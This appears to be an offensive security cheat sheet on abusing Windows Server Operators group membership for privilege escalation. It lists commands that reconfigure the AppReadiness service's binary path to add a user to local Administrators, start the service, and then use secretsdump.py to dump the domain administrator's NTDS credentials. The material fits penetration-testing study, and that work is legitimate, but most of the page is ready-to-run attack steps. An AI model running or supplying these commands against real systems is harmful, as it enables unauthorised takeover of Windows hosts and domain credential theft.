Server Operators

The Server Operators group has broad administrative privileges, including managing services, shares, and local users, but without full administrator rights. Members can start/stop services, modify files, and even execute code with elevated privileges. Attackers can abuse these privileges to modify system services, replace executables, or schedule malicious tasks for privilege escalation. If misconfigured, it can lead to full system takeover by leveraging service abuse or privilege token manipulation.

Enumeration

sc qc AppReadiness

# We can use PsService.exe to check permissions on the service
# https://download.sysinternals.com/files/PSTools.zip
C:\Path\To\PsService.exe security AppReadiness

# If we have full controll over the service we can abuse this rights.

Abuse

net localgroup Administrators

# Add 'rezydev' to Local Administrators Group
sc config AppReadiness binPath= "cmd /c net localgroup Administrators rezydev /add"

# Start the Service
sc start AppReadiness

# Our user now should be part of Local Administrator Group.

# We can also dump NTDS.dit database
python3 /path/to/secretsdump.py srvadm@10.10.10.10 -just-dc-user administrator

Enumeration​

Abuse​

Enumeration

Abuse